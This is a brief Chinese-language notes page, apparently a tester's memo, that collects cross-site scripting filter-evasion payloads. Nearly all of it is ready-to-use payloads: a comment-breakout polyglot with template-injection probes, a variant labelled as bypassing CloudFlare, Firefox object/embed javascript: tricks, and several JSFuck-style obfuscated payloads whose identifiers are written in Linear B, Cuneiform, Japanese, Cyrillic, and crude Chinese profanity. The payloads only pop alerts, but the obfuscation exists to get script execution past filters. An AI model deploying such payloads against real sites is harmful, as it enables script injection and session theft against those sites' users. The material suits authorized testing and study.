备忘录
XSS Filter Evasion - OWASP Cheat Sheet Series
Cross-site scripting (XSS) cheat sheet
测试
HackPad
CSP Evaluator
security-tutorial
神秘Payload
1
| '"--><svg/onload=top[30]()>${{4*9}}<script>+alert?.``</script>
|
- top[30] () →不使用
- alert 字词触发 XSS alert? .`` →可选链 + 模板字面量隐秘 JS 执行
- —>< svg > →跳出 HTML 注释
- $ 36 → SSTI,CSTI
微信XSS
1
| <a href="weixin://bizmsgmenu?msgmenucontent=测试内容&msgmenuid=960">显示内容</a>
|
CloudFlare XSS
1
| "><P/onpointerenter=alert(1)>
|
Firefox XSS
1
2
3
| <object data=# codebase=javascript:alert(document.domain)//>
OR
<embed src=# codebase=javascript:alert(document.domain)//>
|
1
| "><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
|
操你妈XSS
1
| <x onmousemove=操='',你=!操+操,妈=!你+操,操操=操+{},操你=你[操++],操妈=你[你操=操],你你=++你操+操,你妈=操操[你操+你你],你[你妈+=操操[操]+(你.妈+操操)[操]+妈[你你]+操你+操妈+你[你操]+你妈+操你+操操[操]+操妈][你妈](妈[操]+妈[你操]+你[你你]+操妈+操你+"(操)")()>test
|
日语XSS
1
2
3
| あ='',い=!あ+あ,う=!い+あ,え=あ+{},お=い[あ++],か=い[き=あ],
く=++き+あ,け=え[き+く],
い[け+=え[あ]+(い.う+え)[あ]+う[く]+お+か+い[き]+け+お+え[あ]+か][け](う[あ]+う[き]+い[く]+か+お+"('ざこ~')")()
|
俄语XSS
1
2
| а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()
|
1
2
3
| 𒀱='',𒁍=!𒀱+𒀱,𒂖=!𒁍+𒀱,𒃵=𒀱+{},𒄿=𒁍[𒀱++],𒅗=𒁍[𒀲=𒀱],
𒆜=++𒀲+𒀱,𒇻=𒃵[𒀲+𒆜],
𒁍[𒇻+=𒃵[𒀱]+(𒁍.𒂖+𒃵)[𒀱]+𒂖[𒆜]+𒄿+𒅗+𒁍[𒀲]+𒇻+𒄿+𒃵[𒀱]+𒅗][𒇻](𒂖[𒀱]+𒂖[𒀲]+𒁍[𒆜]+𒅗+𒄿+"('𒀱𒀲𒀱𒋻𒆜𒀲𒁂𒐫𒉿𒀜𒅔')")()
|